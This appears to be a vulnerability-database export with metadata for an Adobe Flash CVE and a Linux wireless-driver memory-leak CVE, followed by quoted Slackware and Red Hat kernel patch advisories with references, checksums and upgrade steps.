    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "db": "BID",
        "id": "91250"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "db": "PACKETSTORM",
        "id": "137517"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "id": "VAR-201606-0503",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-92969"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:05:27.985000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "APSB16-18",
        "trust": 0.8,
        "url": "http://helpx.adobe.com/security/products/flash-player/apsb16-18.html"
      },
      {
        "title": "APSB16-18",
        "trust": 0.8,
        "url": "https://helpx.adobe.com/jp/security/products/flash-player/apsb16-18.html"
      },
      {
        "title": "Google Chrome \u3092\u66f4\u65b0\u3059\u308b",
        "trust": 0.8,
        "url": "https://support.google.com/chrome/answer/95414?hl=ja"
      },
      {
        "title": "Google Chrome",
        "trust": 0.8,
        "url": "https://www.google.com/intl/ja/chrome/browser/features.html"
      },
      {
        "title": "Chrome Releases",
        "trust": 0.8,
        "url": "http://googlechromereleases.blogspot.jp/"
      },
      {
        "title": "MS16-083",
        "trust": 0.8,
        "url": "https://technet.microsoft.com/en-us/library/security/ms16-083.aspx"
      },
      {
        "title": "RHSA-2016:1238",
        "trust": 0.8,
        "url": "https://access.redhat.com/errata/rhsa-2016:1238"
      },
      {
        "title": "MS16-083",
        "trust": 0.8,
        "url": "https://technet.microsoft.com/ja-jp/library/security/ms16-083.aspx"
      },
      {
        "title": "\u30a2\u30c9\u30d3 \u30b7\u30b9\u30c6\u30e0\u30ba\u793e Adobe Flash Player \u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b",
        "trust": 0.8,
        "url": "http://www.fmworld.net/biz/common/adobe/20160620f.html"
      },
      {
        "title": "Microsoft Internet Explorer  and Microsoft Edge Adobe Flash Player Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=62343"
      },
      {
        "title": "Red Hat: CVE-2016-4150",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-4150"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://helpx.adobe.com/security/products/flash-player/apsb16-18.html"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2016:1238"
      },
      {
        "trust": 1.8,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-083"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1036117"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00031.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00035.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00038.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4150"
      },
      {
        "trust": 0.8,
        "url": "https://www.ipa.go.jp/security/ciadr/vul/20160615-adobeflashplayer.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/at/2016/at160026.html"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4150"
      },
      {
        "trust": 0.8,
        "url": "http://www.npa.go.jp/cyberpolice/topics/?seq=18592"
      },
      {
        "trust": 0.3,
        "url": "http://www.adobe.com"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-4150"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/787.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.securityfocus.com/bid/91250"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4142"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4134"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4124"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4127"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4171"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4153"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4133"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4135"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4125"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4125"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4144"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4139"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4136"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4146"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#critical"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4156"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4142"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4123"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4131"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4129"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4132"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4166"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4149"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4138"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4137"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4143"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4129"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4150"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4146"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4152"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4122"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4147"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4122"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4123"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4131"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4128"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4140"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4147"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4134"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4145"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4128"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4133"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4124"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4127"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4139"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4143"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4154"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4130"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4149"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4151"
      },
      {
        "trust": 0.1,
        "url": "https://helpx.adobe.com/security/products/flash-player/apsa16-03.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4138"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4141"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4132"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4130"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4145"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "db": "BID",
        "id": "91250"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "db": "PACKETSTORM",
        "id": "137517"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "db": "BID",
        "id": "91250"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "db": "PACKETSTORM",
        "id": "137517"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-06-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "date": "2016-06-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "date": "2016-06-16T00:00:00",
        "db": "BID",
        "id": "91250"
      },
      {
        "date": "2016-06-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "date": "2016-06-17T23:50:16",
        "db": "PACKETSTORM",
        "id": "137517"
      },
      {
        "date": "2016-06-16T14:59:32.437000",
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "date": "2016-06-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-92969"
      },
      {
        "date": "2023-01-26T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-4150"
      },
      {
        "date": "2016-07-06T15:01:00",
        "db": "BID",
        "id": "91250"
      },
      {
        "date": "2016-08-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      },
      {
        "date": "2023-01-26T21:06:05.973000",
        "db": "NVD",
        "id": "CVE-2016-4150"
      },
      {
        "date": "2023-01-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft Internet Explorer and  Microsoft Edge of  Adobe Flash Used in library  Adobe Flash Player Vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003261"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-414"
      }
    ],
    "trust": 0.6
  }
}

var-201911-1410
Vulnerability from variot

Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-d10dcb615c8e.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.208/: Upgraded. IPV6_MULTIPLE_TABLES n -> y +IPV6_SUBTREES y These updates fix various bugs and security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.203: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19524 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15917 Fixed in 4.4.204: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18660 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18683 Fixed in 4.4.206: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12614 Fixed in 4.4.207: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19227 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19062 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19338 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19332 Fixed in 4.4.208: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19057 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19063 ( Security fix *) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-generic-smp-4.4.208_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-huge-smp-4.4.208_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-modules-smp-4.4.208_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208_smp-noarch-1.txz

Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-generic-4.4.208-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-headers-4.4.208-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-huge-4.4.208-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-modules-4.4.208-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.208/kernel-source-4.4.208-noarch-1.txz

MD5 signatures: +-------------+

Slackware 14.2 packages: ef3ab53561656d90c19389bed7f883ea kernel-generic-4.4.208-i586-1.txz ce33ac504adf47d140c3d9ffbf7589b2 kernel-generic-smp-4.4.208_smp-i686-1.txz 2fb222e279ceacf6e3af294a1cce54e9 kernel-headers-4.4.208_smp-x86-1.txz c237d6708a9d59080deb5a6659d1acf1 kernel-huge-4.4.208-i586-1.txz 29018038f4e0510dfa7e9cdfe69c994a kernel-huge-smp-4.4.208_smp-i686-1.txz 6518395d78e7c7b323bd964dd3b9ed13 kernel-modules-4.4.208-i586-1.txz 440885e37ee410473bf1c9a6b028dd8b kernel-modules-smp-4.4.208_smp-i686-1.txz 969021b83f0cb73d7b745b3d77bdbee0 kernel-source-4.4.208_smp-noarch-1.txz

Slackware x86_64 14.2 packages: d6edb0754c752aaf8fcbd8d4d5bfc30a kernel-generic-4.4.208-x86_64-1.txz 10255231f7085336046b49e829bf972c kernel-headers-4.4.208-x86-1.txz 369fa14fb7f59f1e903402be3ad685e7 kernel-huge-4.4.208-x86_64-1.txz b8c8261fbb6bed66c3ded3aa36e206df kernel-modules-4.4.208-x86_64-1.txz 83f37ca83c19fe8d1a785c93cc1ad6f5 kernel-source-4.4.208-noarch-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg kernel-*.txz

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208-smp | bash

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.208 | bash

Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.208-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.208 as the version.

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.

If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2020:1769-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:1769 Issue date: 2020-04-28 CVE Names: CVE-2018-16871 CVE-2019-8980 CVE-2019-10639 CVE-2019-15090 CVE-2019-15099 CVE-2019-15221 CVE-2019-17053 CVE-2019-17055 CVE-2019-18805 CVE-2019-19057 CVE-2019-19073 CVE-2019-19074 CVE-2019-19534 CVE-2019-19768 CVE-2019-19922 CVE-2020-1749 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64 Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

Security Fix(es):

  • kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c (CVE-2019-19768)

  • kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence (CVE-2018-16871)

  • kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service (CVE-2019-8980)

  • kernel: unprivileged users able to create RAW sockets in AF_IEEE802154 network protocol. (CVE-2019-17053)

  • kernel: unprivileged users able to create RAW sockets in AF_ISDN network protocol. (CVE-2019-17055)

  • kernel: integer overflow in tcp_ack_update_rtt in net/ipv4/tcp_input.c (CVE-2019-18805)

  • kernel: information leak bug caused by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_core.c driver (CVE-2019-19534)

  • kernel: some ipv6 protocols not encrypted over ipsec tunnel. (CVE-2020-1749)

  • Kernel: net: using kernel space address bits to derive IP ID may potentially break KASLR (CVE-2019-10639)

  • kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to crash or information disclosure (CVE-2019-15090)

  • kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath10k/usb.c leads to a crash (CVE-2019-15099)

  • kernel: Null pointer dereference in the sound/usb/line6/pcm.c (CVE-2019-15221)

  • kernel: Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c allows for a DoS (CVE-2019-19057)

  • kernel: Memory leaks in drivers/net/wireless/ath/ath9k/htc_hst.c in the Linux kernel (DOS) (CVE-2019-19073)

  • kernel: a memory leak in the ath9k management function in allows local DoS (CVE-2019-19074)

  • kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial of service against non-cpu-bound applications (CVE-2019-19922)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1655162 - CVE-2018-16871 kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence 1679972 - CVE-2019-8980 kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service 1729933 - CVE-2019-10639 Kernel: net: using kernel space address bits to derive IP ID may potentially break KASLR 1738741 - L2 guest hit kernel panic when do L1->L1 live migration on PML-enabled intel host 1743526 - CVE-2019-15090 kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to crash or information disclosure 1743560 - CVE-2019-15099 kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath10k/usb.c leads to a crash 1749633 - kernel: brk can grow the heap into the area reserved for the stack 1749974 - CVE-2019-15221 kernel: Null pointer dereference in the sound/usb/line6/pcm.c 1752765 - conntrack tool delete entry with CIDR crash 1757902 - fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITSd 1758242 - CVE-2019-17053 kernel: unprivileged users able to create RAW sockets in AF_IEEE802154 network protocol. 1758248 - CVE-2019-17055 kernel: unprivileged users able to create RAW sockets in AF_ISDN network protocol. 1765547 - Fallocate on XFS may discard concurrent AIO write 1767664 - Backport CIFS stale ESTALE handling and dentry revalidation patches 1771430 - svcrdma: Increase the default connection credit limit 1771496 - CVE-2019-18805 kernel: integer overflow in tcp_ack_update_rtt in net/ipv4/tcp_input.c 1771691 - Process killed while opening a file can result in leaked open handle on the server 1774933 - CVE-2019-19074 kernel: a memory leak in the ath9k management function in allows local DoS 1774937 - CVE-2019-19073 kernel: Memory leaks in drivers/net/wireless/ath/ath9k/htc_hst.c in the Linux kernel (DOS) 1775050 - CVE-2019-19057 kernel: Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c allows for a DoS 1783540 - CVE-2019-19534 kernel: information leak bug caused by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_core.c driver 1786164 - CVE-2019-19768 kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c 1789594 - kernel: Wrong FE0/FE1 MSR restore in signal handlers on ppc64le 1792512 - CVE-2019-19922 kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial of service against non-cpu-bound applications 1795049 - RHEL8: Latency issue on Kubernetes / k8s / OpenShift 1803162 - [NFS] Dataloss with copy_file_range on NFS-mounted files that is not 4K aligned on RHEL 8. 1809833 - CVE-2020-1749 kernel: some ipv6 protocols not encrypted over ipsec tunnel.

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-193.el8.src.rpm

